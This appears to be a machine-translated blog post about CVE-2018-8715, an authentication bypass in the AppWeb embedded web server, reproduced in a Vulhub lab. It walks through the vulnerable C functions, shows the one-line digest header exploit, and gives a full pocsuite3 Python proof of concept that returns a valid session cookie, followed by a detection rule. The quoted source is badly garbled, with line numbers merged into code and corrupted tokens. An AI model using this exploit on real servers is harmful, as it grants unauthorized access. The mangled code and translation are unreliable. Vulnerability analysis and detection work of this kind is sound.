Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about what AppWeb authentication bypass loophole in Vulhub loophole is like. Many people may not know much about it. In order to make you understand better, the editor summarized the following content for you. I hope you can get something according to this article.

Introduction to AppWeb Authentication Bypass vulnerability (CVE-2018-8715) 1.AppWeb:

AppWeb is an embedded Web Server based on GPL open source protocol, which is developed and maintained by Embedthis Software LLC. He is written in C _ + and can run on almost all the most popular operating systems. Of course, his main application scenario is to provide Web Application containers for embedded devices.

AppWeb can be configured for authentication, and its authentication methods include the following three:

1.basic traditional HTTP basic Certification

2.digest improved version of HTTP basic authentication. After successful authentication, Cookie will be used to save the state without passing the Authorization header.

3.form form authentication

two。 Vulnerability description:

In the version before 7.0.3, for digest and form authentication, if the password passed by the user is null (that is, no password parameter is passed), appweb will cause the direct authentication to succeed due to a logic error and return session.

3. Vulnerability principle:

Due to logical flaws in the authentication process, the target user name is known, so authentication of form and digest type authentication can be completely bypassed by well-designed HTTP POST requests.

File http / httpLib.c-function authCondition ()

This function is responsible for calling the two functions responsible for authentication: getCredentials and httpLogin. Note the lack of checks around the httpGetCredentials, which will be used later in the analysis

14559 static int authCondition (HttpConn * conn, HttpRoute * route, HttpRouteOp * op) 14560 {14561 HttpAuth * auth;14562 cchar * username, * password;1456314564 assert (conn); 14565 assert (route); 1456614567 auth = route- > auth;14568 if (! auth | |! auth- > type) {14569 / * Authentication not required * / 14570 return HTTP_ROUTE_OK;14571} 14572 if (! httpIsAuthenticated (conn)) {14573 httpGetCredentials (conn, & username, & password) 14574 if (! httpLogin (conn, username, password) {14575 if (! conn- > tx- > finalized) {14576 if (auth & & auth- > type) {14577 (auth- > type- > askLogin) (conn); 14578} else {14579 httpError (conn, HTTP_CODE_UNAUTHORIZED, "Access Denied, login required"); 14580} 14581 / * Request has been denied and a response generated. So OK to accept this route. * / 14582} 14583 return HTTP_ROUTE_OK;14584} 14585} 14586 if (! httpCanUser (conn, NULL)) {14587 httpTrace (conn, "auth.check", "error", "msg:'Access denied, user is not authorized for access'"); 14588 if (! conn- > tx- > finalized) {14589 httpError (conn, HTTP_CODE_FORBIDDEN, "Access denied. User is not authorized for access."); 14590 / * Request has been denied and a response generated So OK to accept this route. * / 14591} 14592} 14593 / * OK to accept route. This does not mean the request was authenticated-an error may have been already generated * / 14594 return HTTP_ROUTE_OK;14595}

File http / httpLib.c-function httpGetCredentials ()

This function receives two pointers to the char array that will contain the user name and password parsed from the request. Since there is no check in authCondition, it is not important that the "parseAuth" function fails, which means that we can insert any field we want in the WWW-Authenticate header or post data for authentication:

1641 Get the username and password credentials. If using an in-protocol auth scheme like basic | digest, the1642 rx- > authDetails will contain the credentials and the parseAuth callback will be invoked to parse.1643 Otherwise, it is expected that "username" and "password" fields are present in the request parameters.16441645 This is called by authCondition which thereafter calls httpLogin1646 * / 1647 PUBLIC bool httpGetCredentials (HttpConn * conn, cchar * * username, cchar * * password) 1648 {1649 HttpAuth * auth;16501651 assert (username); 1652 assert (password); 1653 * username = * password = NULL;16541655 auth = conn- > rx- > route- > auth 1656 if (! auth | |! auth- > type) {1657 return 0n1658} 1659 if (auth- > type) {1660 if (conn- > authType &! smatch (conn- > authType, auth- > type- > name)) {1661 if (! (smatch (auth- > type- > name, "form") & conn- > rx- > flags & HTTP_POST) {1662 / * If a posted form authentication, ignore any basic | digest details in request * / 1663 return 0 1664} 1665} 1666 if (auth- > type- > parseAuth & & (auth- > type- > parseAuth) (conn, username, password)

< 0) {1667 return 0;1668 }1669 } else {1670 *username = httpGetParam(conn, "username", 0);1671 *password = httpGetParam(conn, "password", 0);1672 }1673 return 1;1674 } 文件http / httpLib.c -函数httpLogin（） 此函数将检查用户名是否不为null，如果已经存在会话，则密码指针可以改为null。 1686 PUBLIC bool httpLogin(HttpConn *conn, cchar *username, cchar *password)1687 {1688 HttpRx *rx;1689 HttpAuth *auth;1690 HttpSession *session;1691 HttpVerifyUser verifyUser;16921693 rx = conn->

Rx;1694 auth = rx- > route- > auth;1695 if (! username | |! * username) {1696 httpTrace (conn, "auth.login.error", "error", "msg:'missing username'"); 1697 return 0 error} 1699 if (! auth- > store) {1700 mprLog ("error http auth", 0, "No AuthStore defined"); 1701 return 0 1702} 1703 if ((verifyUser = auth- > verifyUser) = = 0) {1704 if (! auth- > parent | | (verifyUser = auth- > parent- > verifyUser) = = 0) {1705 verifyUser = auth- > store- > verifyUser;1706} 1707} 1708 if (! verifyUser) {1709 mprLog ("error http auth", 0, "No user verification routine defined on route% s", rx- > route- > pattern); 1710 return 0 1711} 1712 if (auth- > username & & * auth- > username) {1713 / * If using auto-login, replace the username * / 1714 username = auth- > username;1715 password = 0x 1716} 1717 if (! (verifyUser) (conn, username, password)) {1718 return 0t1719} 1720 if (! (auth- > flags & HTTP_AUTH_NO_SESSION) & &! auth- > store- > noSession) {1721 if ((session = httpCreateSession (conn)) = 0) {1722 / * Too many sessions * / 1723 return 0 1724} 1725 httpSetSessionVar (conn, HTTP_SESSION_USERNAME, username); 1726 httpSetSessionVar (conn, HTTP_SESSION_IP, conn- > ip); 1727} 1728 rx- > authenticated = 1trit1729 rx- > authenticateProbed = 1ut1730 conn- > username = sclone (username); 1731 conn- > encoded = 0Ten 1732 return 1 1733} File http/httpLib.c-function configVerfiyUser () The following function will first check for the presence of a valid user, either because it was already set in the session, or because it was passed, since we are able to pass a null password (line 2031), we can bypass the actual checks and successfully authenticate reaching line 2055.2014 / * 2015 Verify the user password for the "config" store based on the users defined via configuration directives.2016 Password may be NULL only if using auto-login.2017 * / 2018 static bool configVerifyUser (HttpConn * conn, cchar * username, cchar * password) 2019 {2020 HttpRx * rx 2021 HttpAuth * auth;2022 bool success;2023 char * requiredPassword;20242025 rx = conn- > rx;2026 auth = rx- > route- > auth;2027 if (! conn- > user & & (conn- > user = mprLookupKey (auth- > userCache, username)) = = 0) {2028 httpTrace (conn, "auth.login.error", "error", "msg: 'Unknown user', username:'%s'", username); 2029 return 0 2030} 2031 if (password) {2032 if (auth- > realm = = 0 | | * auth- > realm = ='\ 0') {2033 mprLog ("error http auth", 0, "No AuthRealm defined"); 2034} 2035 requiredPassword = (rx- > passwordDigest)? Rx- > passwordDigest: conn- > user- > password;2036 if (sncmp (requiredPassword, "BF", 2) = = 0 & slen (requiredPassword) > 4 & & isdigit (requiredPassword [2]) & & 2037 requiredPassword [3] = =':') {2038 / * Blowifsh * / 2039 success = mprCheckPassword (sfmt ("% s:%s:%s", username, auth- > realm, password), conn- > user- > password) 20402041} else {2042 if (! conn- > encoded) {2043 password = mprGetMD5 ("% s:%s:%s", username, auth- > realm, password); 2044 conn- > encoded = 1 auth- 2045} 2046 success = smatch (password, requiredPassword); 2047} 2048 if (success) {2049 httpTrace (conn, "auth.login.authenticated", "context", "msg:'User authenticated', username:'%s'", username) 2050} else {2051 httpTrace (conn, "auth.login.error", "error", "msg:'Password failed to authenticate', username:'%s'", username); 2052} 2053 return success;2054} 2055 return 1

In order to be able to bypass authentication, we need to be able to pass a null password pointer, fortunately, for forms and digest authentication, the function that parses authentication details (line 1666) will allow us to set a null password pointer and, even if an error is returned, will not eventually be checked by authCondition, allowing us to bypass authentication altogether, the only condition for this is to know the user name in hashmap.

To overcome this limitation, it is important to consider that the size of the hash map is usually small and the hash algorithm (FNV) used in the hash map is weak: the number of attempts is limited, conflicts may be found, and the login does not know a valid user name (untested).

4. Vulnerability exploitation:

The constructed get packet is added to the usename field we constructed. Note that the user name already exists before it can be constructed.

Authorization: Digest username= "admin"

Here is a small hole, after we get the session data, we need a browser plug-in to write it in.

This is the result of failure.

If you think the browser under linux is not easy to operate, you can move to windows:

This is the result of success, and it's much easier to use tools like burp now if you often operate under windows.

Written by 5.poc: from collections import OrderedDictimport requestsfrom pocsuite3.api import Output, POCBase, OptString, register_poc, POC_CATEGORY OptDictclass DemoPOC (POCBase): vulID = '003' # ssvid version =' 1.0' author = ['xssle'] vulDate =' 2019-09-20' createDate = '2019-09-20' updateDate =' 2019-09-20' references = ['https://www.seebug.org/vuldb/ssvid-97181'] name =' AppWeb authentication bypass vulnerability (CVE-2018-8715) 'appPowerLink =' https://www. Embedthis.com/' appName = 'AppWeb' appVersion =' < 7.0.3' vulType = 'Login Bypass' desc =''in versions prior to 7.0.3 For digest and form authentication, if the password passed by the user is null (that is, no password parameter is passed), appweb will cause the direct authentication to succeed due to a logic error and return session. '' samples = [] install_requires = [] category = POC_CATEGORY.EXPLOITS.WEBAPP protocol = POC_CATEGORY.PROTOCOL.HTTPdef _ options (self): O = OrderedDict () o ["username"] = OptString (', description=' this poc requires the user to enter a login account' Require=True) return odef _ verify (self): result = {} playload = "Digest username=\" {0}\ ".format (self.get_option (" username ")) get_headers = {'Proxy-Connection':' keep-alive','Upgrade-Insecure-Requests':'1) Mozilla/5.0 (Windows NT 10.0) Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding':' gzip, deflate','Accept-Language': 'zh-CN,zh Qroom0.9'} vul_url = self.urlif vul_url.endswith ('/'): vul_url = vul_url [:-1] if "http://" in vul_url: host = vul_ URL [7:] elif" https://" in vul_url: host = vul_ URL [8:] else: host = vul_url get _ headers ['Host'] = host get_headers [' Authorization'] = playload r = requests.get (url=vul_url Headers=get_headers) if r.status_code = = 200: result ['VerifyInfo'] = {} result [' VerifyInfo'] ['URL'] = vul_url result [' VerifyInfo'] ['set-cookie'] = r.headers [' set-cookie'] else: result ['VerifyInfo'] = {} result [' VerifyInfo'] ['URL'] = vul_url Result ['VerifyInfo'] [' set-cookie'] = get_headersreturn self.parse_output (result) def _ attack (self): return self._verify () def parse_output (self) Result): output = Output (self) if result: output.success (result) else: output.fail ('target is not vulnerable') return outputregister_poc (DemoPOC)

6. Vulnerability detection rules:

The following content is added to the requested packet, because the vulnerability will be triggered only if the user name of the usenmae field exists, so as long as we find that the following field has been added to the packet during detection, then there may be an attack.

Authorization: Digest username= "admin"

Add the following rules

Authorization: Digest username=

After reading the above, do you have any further understanding of AppWeb authentication bypass vulnerabilities in Vulhub vulnerabilities? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.